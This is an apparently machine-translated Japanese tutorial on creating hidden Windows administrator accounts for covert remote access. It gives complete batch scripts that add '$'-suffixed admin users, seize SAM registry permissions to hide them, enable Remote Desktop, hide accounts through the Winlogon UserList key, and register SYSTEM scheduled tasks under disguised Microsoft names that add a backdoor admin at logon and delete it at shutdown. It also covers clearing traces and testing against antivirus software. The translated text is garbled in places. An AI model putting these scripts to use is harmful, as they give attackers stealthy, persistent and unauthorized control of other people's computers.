Windowsシステムは非表示のユーザーを作成します
前提条件:新しく追加されたユーザーの攻撃方法について、新しく追加されたユーザーが起動時に新しく追加されたユーザーを表示しないようにする方法はありますが、ユーザーがリモートでログインするための使用には影響しませんか?
1.環境はWinXPまたはWin7です
。2。データを確認して確認します。3。
小さなツールへの拡張を奨励します。これにより、バッチ処理で新しいユーザーを追加し、起動時に表示されないという目的を達成できます。
1つ試してください:/ active:no
仮想マシンIP:192.168.125.138
これにより、リモートログインが機能することも保証されます
結果:
このメソッドはJZP11を非表示にしていることがわかりましたが、非アクティブに設定されているため、リモートログインは機能しません。
2つのHideAdmin.exeを試してください
まず、情報を探す過程で、開発したソフトウェアHideAdminを見つけました。
しかし、それは自分で行ってください。
レジストリの変更を3回試みます
まず、上記の機能が実現できるかどうかを手動で設定しました。
情報を照会した後、レジストリを変更するとユーザーが非表示になる可能性があることがわかりました
(1)比較結果:ユーザー名がドル記号で終わっている場合、$で終わるユーザー名はコマンドラインに表示されません。
この時点で、最初の非表示に達しましたが、Ctrl + Alt + Insertを使用してユーザーを切り替えると、要件を満たせない確立されたユーザーが表示されます。
(2)探索する次のステップ:
プロセス中にSAMを開くことができない状況に遭遇しました
解決策:SAM権限を変更して、管理者ユーザーがフルコントロールと読み取り権限を取得できるようにします。
(3)名前を使用して、
管理者タイプ0x1f4
Jzp $タイプ0x3edを表示できます。
アカウントの項目の下に、関連するキー値が表示されます。Fは関連する機関のパラメーターを表し、Vはユーザーのいくつかの基本的なパラメーターを表します。
(4)まず:jzpの名前登録項目をエクスポートします。管理者とJZP $に対応するエントリをエクスポートします。
(5)管理者アカウントパラメータ設定の登録項目のFキー値をコピーし、jzp $に対応するユーザのフォルダのパラメータ設定登録項目のFキー値を置き換えます。
.reg以txt形式打开
(5)コマンドラインでjzp $ユーザーを削除します。
jzp $に関連するアカウント情報が削除されたことがregeditで見つかりました。
(6)jzp $の名前登録項目と変更されたusersテーブル項目をレジストリにインポートします。
非表示のユーザーはコマンドラインから照会されません
コントロールパネルは非表示のユーザーを検出しません
ユーザー名がわかっている場合は、コマンドラインから非表示のユーザーを知ることができます。また、レジストリから非表示のユーザーを見つけることもできます。
でも、大きな問題ではないと思います。普通の人は登録フォームを見るのに飽きています。
リモートログイン
で、アカウントが無効になっていることがわかりました
コマンド:
ネットユーザーJZP $ / active:yes
ログイン成功。
では、このマシンはどのようにログインしてユーザーを非表示にするのでしょうか。
Windows + R-> gpedit.msc
ただし、ユーザー名を覚えておく必要があります。そうしないと、システムに入ることができません。
ガジェット制作
@echo off
net user jzp123$ jzp /add
net localgroup administrators jzp123$ /add
Echo HKEY_LOCAL_MACHINE\SAM[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users[1] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names[1] >>c:/tem.ini
regini c:/tem.ini
regedit /e c:\1.reg HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
net user jzp123$ /del
regedit /s c:\1.reg
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM\Domains[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\SAM[0] >>c:/tem.ini
Echo HKEY_LOCAL_MACHINE\SAM\[0] >>c:/tem.ini
regini c:/tem.ini
del c:\tem.ini
del c:\1.reg
net user jzp123$ /active:yes
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
コマンドの説明:
(1)@echo off
@echo offは、このコマンドを実行した後、すべてのコマンド(このコマンド自体を含む)のエコーをオフにすることを意味します。
(2)ユーザーコードを作成し、管理者グループに昇格させ
ます。netuser jzp123 $ jzp / add
net localgroup Administrators jzp123 $ / add
注:ここでユーザーのパスワードを作成する必要があります。そうしないと、ログインできません。
(3)フルコントロールとしてユーザーの権限を変更します。
エコーHKEY_LOCAL_MACHINE \ SAM [1] >> c:/tem.ini
エコーHKEY_LOCAL_MACHINE \ SAM \ SAM [1] >> c:/tem.ini
エコーHKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains [1] >> c:/ tem。 ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account [1] >> c:/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users [1] >> c:/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users \ Names [1] >> c:/tem.ini
説明:
ここでのパスは、
[xyz]の上で手動で操作されたパスです:
x、y、zはすべて数字で、次のとおりです。管理者全員システム権限の変更を意味し
ます1-管理者はフルアクセスなので、上記は[1]です。
>>:>>の前の同じ回線パスをcドライブの下のtem.iniに書き込むことを意味します
(4)レジストリとレジストリのアクセス許可を変更し、
作成したばかりの構成ファイルregini c:/tem.iniを実行します。Regini
プログラムには、XP以降で使用可能なオペレーティングシステムが付属しています。
(5)レジストリをエクスポートします
regedit /ec:\1.reg HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users
(6)非表示のユーザーを削除し、レジストリ
ネットユーザーjzp123 $ / del
regedit /sc:\1.regをインポートします。
(7)清楚痕迹、完了活活
エコーHKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users \ Names [0] >> c:/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account \ Users [0] >> c:/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains \ Account [0] >> c:/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM \ Domains [0] >> c:/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM \ SAM [0] >> c:/tem.ini
Echo HKEY_LOCAL_MACHINE \ SAM [0] >> c:/tem.ini
regini c:/tem.ini
del c:\ tem.ini
del c:\ 1.reg
netユーザーjzp123 $ / active:yes
(8)コマンド
reg add "HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server"を使用して、リモートログインサービスを開きます/ v fDenyTSConnections / t REG_DWORD / d 0 / f
実際、コードにはキー値Fをコピーするプロセスがありません。、これは私が気付いていないところです。
したがって、コードを実行すると、リモートログインに次のインターフェイスが表示されます。
ただし、これは手動で補正できます。
この設定後、リモートログインを実現できます。
ツール:
4を試す
レジストリエディタで新しいキー値を作成します
。HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList
新しいDWORD値を作成し、非表示にする必要のあるユーザーの名前を付けて、値を0(0は非表示、1は表示を意味します)
@echo off
net user xh521$ xh521$ /add
net localgroup administrators xh521$ /add
regedit /s .\xh521$.reg
pause
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"xh521$"=dword:00000000
成功!!この方法は、上記よりもはるかに簡単です。
ログインユーザーは非表示のユーザーを作成し、シャットダウンして削除します
例に従って、トリガーイベントをトリガー条件として受け取る計画タスクを設計します。実現:
1。シャットダウン条件が
傍受されたときに新しいユーザーを作成します; 2。起動イベントが傍受されたときに新しく追加されたユーザーを削除します;
3。環境にウイルス対策ソフトウェアをインストールして、このプロセスがアラームを引き起こすかどうかを確認します。
考えてみてください。実際、起動後にユーザーを作成しても、ユーザーを非表示にする機能は実現しないので、ユーザーのログイン後に非表示のユーザーを作成するのは正しい操作だと思います。
(1)イベントを使用してコマンドをトリガーするschtasks
はschtasksを使用して主に機能を完了します。特定のログイベントを使用してnet userコマンドをトリガーし、管理者アカウントを追加する目的を達成します。
次に、最初にイベントのID番号を知る必要があります。
シャットダウンまたは再起動。再起動はシャットダウンの一種です。
ログインユーザー:
ログインしたユーザーがユーザーを作成するためのコード:
コードの説明:
schtasks / create:
パラメーター/ createは、新しいスケジュールされたタスクを作成することを示します。
/ tn "Microsoft \ Windows \ LocalEventLogRotate":
/ tnは、新しく作成されたスケジュールされたタスクの名前が "Microsoft \ Windows \ LocalEventLogRotate"であることを示します。
/ tr "" cmd.exe ":
/ trは、スケジュールされたタスクによって実行されるコマンドまたはプロセスです。パラメーターのない単なるプロセスの場合は、" / tr C:\と直接記述できることに注意してください。 windows \ calc.exe "。
ただし、パラメータを使用するプロセスの場合(特に、/ kなどのパラメータを使用するパラメータはschtasks自体のパラメータで繰り返される場合があります)、二重引用符で囲む必要があります。
たとえば、この例での実際の実行は次のとおりです。cmd.exeフレームワークではnetuserに対して複数のコマンドがあるため、/ trに続く二重引用符は終了後の二重引用符と対称です。二重引用符はすべてcmd.exeによって実行されるコマンドです。このようにして、過去にバッチ処理が必要だった作業を完了することができます(別のバッチファイルを作成する必要はありません)。
実行されたコマンドラインでスキルを分析します。cmd.exe/ kはcmdの次のコマンドを実行します。各コマンドis終了は>> nulで表され、2つのコマンドラインは「&」で接続され、最後のコマンドはcmd.exeを終了させるための「exit」です。
/ f:
タスクがすでにタスクプランに含まれている場合、タスクが強制的に作成され、アラームが抑制されることを示します。
/ ru system:
指定されたタスクが実行される「実行モード」ユーザーアカウント(ユーザーコンテキスト)を表します。システムアカウントの場合、有効な値は「」、「NT AUTHORITY \ SYSTEM」、または「SYSTEM」です。v2タスクの場合、「NT AUTHORITY \ LOCALSERVICE」と「NTAUTHORITY \ NETWORKSERVICE」、および共通のSIDもこれら3つで使用できます。
/ ecセキュリティ
/ EC ChannelNameは、OnEventトリガーのイベントチャネルを指定します。
/ sc onevent:
/ scscheduleスケジュールの頻度を指定します。含まれる頻度は、MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE、ONEVENTです。この例では、イベントを使用してoneventをトリガーします。
/ mo " [System [Provider [@ Name = 'Microsoft-Windows-Security-Auditing'] and EventID = 4624]]":
/ MO修飾子プランタイプが改善され、プランの繰り返し期間をより適切に制御できるようになりました。有効な値は次のとおりです:/ D日は曜日による実行を意味し、/ M月は年の最初の数か月(デフォルトでは月の最初の日)での実行を意味します...イベントがイベントでトリガーされる場合、
この例のイベントを表す
「 [System [Provider [@ Name = 'Microsoft-Windows-Security-Auditing'] and EventID = 4740]]」など、特定のイベント(文字列)がパラメーターとして使用されます。特定のイベントは自分で定義できます。イベントIDは、ログの特定の内容を確認することで判別できます。
ユーザーコードを削除するには、シャットダウンまたは再起動します。
2つのコードを.batファイルとして保存します
@echo off
@schtasks /create /tn "Microsoft\Windows\LocalEventLogRotate" /tr "\"cmd.exe\" /k net user xhjzp xhjzp /add /y /active:yes >> nul & net localgroup administrators xhjzp /add >nul & net user xhjzp /comment:\"Built-in account for Backdooring your network suckers\" > nul & exit" /f /ru system /ec Security /sc onevent /mo "*[System[Provider[@Name='Microsoft-Windows-Security-Auditing'] and EventID=4624]]"
@schtasks /create /tn "Microsoft\Windows\LocalEventLog" /tr "\"cmd.exe\" /k net user xhjzp /del > nul & exit" /f /ru system /sc onevent /ec System /mo "*[System[EventID=1074]]"
プログラムの実行結果:
コマンドの実行後、非表示のユーザーは一覧表示されません。
作成した非表示のユーザーは起動後
に表示されません。既存のユーザーを入力した後、コマンドラインを使用して作成したユーザーを確認しましたが、一般の人はそこに何人のユーザーがいるかを確認するのに飽きることがないため、効果は大きくありません。です。
ユーザーを切り替えると、確立されたユーザーを見つけることもできますが、これをタスクと組み合わせて、両方の場所で非表示にすることができます。
再起動後、作成されたユーザーが見つかりませんでした。
次に、テスト用のウイルス対策ソフトウェアをインストールします。
私の侵入は失敗しました、道は長くて邪魔です!
リモートログイン:成功!
360またはログを介してログインの痕跡を見つけることができます。